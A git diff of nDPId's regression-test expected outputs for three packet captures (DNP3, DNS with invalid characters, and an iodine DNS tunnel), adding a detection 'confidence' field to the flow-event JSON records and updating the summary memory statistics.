 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097512255234,"flow_last_seen":1097512255234,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1097512255234,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1184,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1097512255234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1097512255234,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBpNAAIAG4CoKAAAICgAAAwSgTiANrtDCAAAAAHAC\/\/895AAAAgQFtAEBBAI="}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1097512255234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1097512255234,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBpNAAIAG4CoKAAAICgAAAwSgTiANrtDCAAAAAHAC\/\/895AAAAgQFtAEBBAI="}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1097512255234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1097512255234,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBpNAAIAG4CoKAAAICgAAAwSgTiANrtDCAAAAAHAC\/\/895AAAAgQFtAEBBAI="}
-00597{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097512255234,"flow_last_seen":1097512255236,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1097512255236,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1184,"dst_port":20000,"l4_proto":"tcp","ndpi": {"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
+00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097512255234,"flow_last_seen":1097512255236,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1097512255236,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1184,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":505,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097513177295,"flow_last_seen":1097513177295,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1097513177295,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1084,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1097513177295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1097513177295,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAUpAAIAG5XIKAAAJCgAAAwQ8TiBc3qwfAAAAAHAC\/\/8TugAAAgQFtAEBBAI="}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1097513177295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1097513177295,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAUpAAIAG5XIKAAAJCgAAAwQ8TiBc3qwfAAAAAHAC\/\/8TugAAAgQFtAEBBAI="}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1097513177295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1097513177295,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAUpAAIAG5XIKAAAJCgAAAwQ8TiBc3qwfAAAAAHAC\/\/8TugAAAgQFtAEBBAI="}
-00597{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":514,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097513177295,"flow_last_seen":1097513177297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1097513177297,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1084,"dst_port":20000,"l4_proto":"tcp","ndpi": {"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":135,"flow_first_seen":1097505644006,"flow_last_seen":1097506028601,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1080,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
-00636{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097513177295,"flow_last_seen":1097513185107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":5,"midstream":0,"ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1084,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":93,"flow_first_seen":1097507785883,"flow_last_seen":1097507856257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":1419,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1086,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
-00637{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1097510947092,"flow_last_seen":1097510959487,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":7,"midstream":0,"ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1159,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
-00637{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1097512255234,"flow_last_seen":1097512267645,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":9,"midstream":0,"ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1184,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
+00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":514,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097513177295,"flow_last_seen":1097513177297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1097513177297,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1084,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":135,"flow_first_seen":1097505644006,"flow_last_seen":1097506028601,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1080,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
+00662{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097513177295,"flow_last_seen":1097513185107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":5,"midstream":0,"ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1084,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":93,"flow_first_seen":1097507785883,"flow_last_seen":1097507856257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":1419,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1086,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
+00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1097510947092,"flow_last_seen":1097510959487,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":7,"midstream":0,"ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1159,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
+00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1097512255234,"flow_last_seen":1097512267645,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":9,"midstream":0,"ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1184,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
 00154{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","total-events-serialized":54}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 543/543
@@ -60,10 +60,10 @@
 ~~ total active/idle flows...: 8/8
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4621024 bytes
-~~ total memory freed........: 4621024 bytes
-~~ total allocations/frees...: 100118/100118
+~~ total memory allocated....: 4703681 bytes
+~~ total memory freed........: 4703681 bytes
+~~ total allocations/frees...: 101708/101708
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 159 chars
-~~ json string max len.......: 647 chars
-~~ json string avg len.......: 473 chars
+~~ json string max len.......: 673 chars
+~~ json string avg len.......: 486 chars
diff --git a/test/results/dns-invalid-chars.pcap.out b/test/results/dns-invalid-chars.pcap.out
index 80df3ef63..7a1e457be 100644
--- a/test/results/dns-invalid-chars.pcap.out
+++ b/test/results/dns-invalid-chars.pcap.out
@@ -1,10 +1,10 @@
 00449{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dns-invalid-chars.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dns-invalid-chars.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946734886956,"flow_last_seen":946734886956,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":946734886956,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35980,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns-invalid-chars.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946734886956,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":946734886956,"pkt":"AAAAAAAAAAAAAAAACABFAABMyRJAAEARc4x\/AAABfwAAAYyMADUAOP5Ln2wBAAABAAAAAAAAA3d3dxdhbGx5b3VyYmEEBQZhcmViZWxvbmd0bwJjbgAAAQAB"}
-00748{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns-invalid-chars.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946734886956,"flow_last_seen":946734886956,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":946734886956,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35980,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.allyourba???arebelongto.cn","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns-invalid-chars.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946734886956,"flow_last_seen":946734886956,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":946734886956,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35980,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.allyourba???arebelongto.cn","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00523{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns-invalid-chars.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946734886957,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"ts_msec":946734886957,"pkt":"AAAAAAAAAAAAAAAACABFAABcAABAAEARPI9\/AAABfwAAAQA1jIwASP5bn2yBgAABAAEAAAAAA3d3dxdhbGx5b3VyYmFzZXNhcmUBAgNvbmd0bwJjbgAAAQABwAwAAQABAAAAPAAEE7mN8Q=="}
-00764{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns-invalid-chars.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946734886956,"flow_last_seen":946734886957,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":946734886957,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35980,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.allyourbasesare???ongto.cn","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"19.185.141.241"}}
-00642{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"dns-invalid-chars.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946734886956,"flow_last_seen":946734886957,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":946734886957,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35980,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns-invalid-chars.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946734886956,"flow_last_seen":946734886957,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":946734886957,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35980,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.allyourbasesare???ongto.cn","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"19.185.141.241"}}
+00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"dns-invalid-chars.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946734886956,"flow_last_seen":946734886957,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":946734886957,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35980,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00164{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"dns-invalid-chars.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 2/2
@@ -14,10 +14,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4594887 bytes
-~~ total memory freed........: 4594887 bytes
-~~ total allocations/frees...: 99555/99555
+~~ total memory allocated....: 4679840 bytes
+~~ total memory freed........: 4679840 bytes
+~~ total allocations/frees...: 101145/101145
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 169 chars
-~~ json string max len.......: 769 chars
-~~ json string avg len.......: 533 chars
+~~ json string max len.......: 795 chars
+~~ json string avg len.......: 546 chars
diff --git a/test/results/dns-tunnel-iodine.pcap.out b/test/results/dns-tunnel-iodine.pcap.out
index 67431dc48..b561387a3 100644
--- a/test/results/dns-tunnel-iodine.pcap.out
+++ b/test/results/dns-tunnel-iodine.pcap.out
@@ -1,11 +1,11 @@
 00449{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dns-tunnel-iodine.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dns-tunnel-iodine.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1282356640051,"flow_last_seen":1282356640051,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1282356640051,"l3_proto":"ip4","src_ip":"10.0.2.30","dst_ip":"10.0.2.20","src_port":44639,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns-tunnel-iodine.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1282356640051,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1282356640051,"pkt":"CAAnx266CAAnnOC0CABFAABEAABAAEARIngKAAIeCgACFK5fADUAMAHkErABAAABAAAAAAAAC3ZhYWFha2FyZGxpBnBpcmF0ZQNzZWEAAAoAAQ=="}
-00744{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns-tunnel-iodine.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1282356640051,"flow_last_seen":1282356640051,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1282356640051,"l3_proto":"ip4","src_ip":"10.0.2.30","dst_ip":"10.0.2.20","src_port":44639,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vaaaakardli.pirate.sea","num_queries":0,"num_answers":0,"reply_code":0,"query_type":10,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns-tunnel-iodine.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1282356640051,"flow_last_seen":1282356640051,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1282356640051,"l3_proto":"ip4","src_ip":"10.0.2.30","dst_ip":"10.0.2.20","src_port":44639,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vaaaakardli.pirate.sea","num_queries":0,"num_answers":0,"reply_code":0,"query_type":10,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns-tunnel-iodine.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1282356640051,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"ts_msec":1282356640051,"pkt":"CAAnnOC0CAAnx266CABFAABZAABAAEARImMKAAIUCgACHgA1rl8ARRoeErCEAAABAAEAAAAAC3ZhYWFha2FyZGxpBnBpcmF0ZQNzZWEAAAoAAcAMAAoAAQAAAAAACVZBQ0tEA8XpAQ=="}
-00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns-tunnel-iodine.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1282356640051,"flow_last_seen":1282356640051,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":101,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1282356640051,"l3_proto":"ip4","src_ip":"10.0.2.30","dst_ip":"10.0.2.20","src_port":44639,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"23":"Suspicious DNS traffic"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vaaaakardli.pirate.sea","num_queries":1,"num_answers":1,"reply_code":0,"query_type":10,"rsp_type":10,"rsp_addr":"0.0.0.0"}}
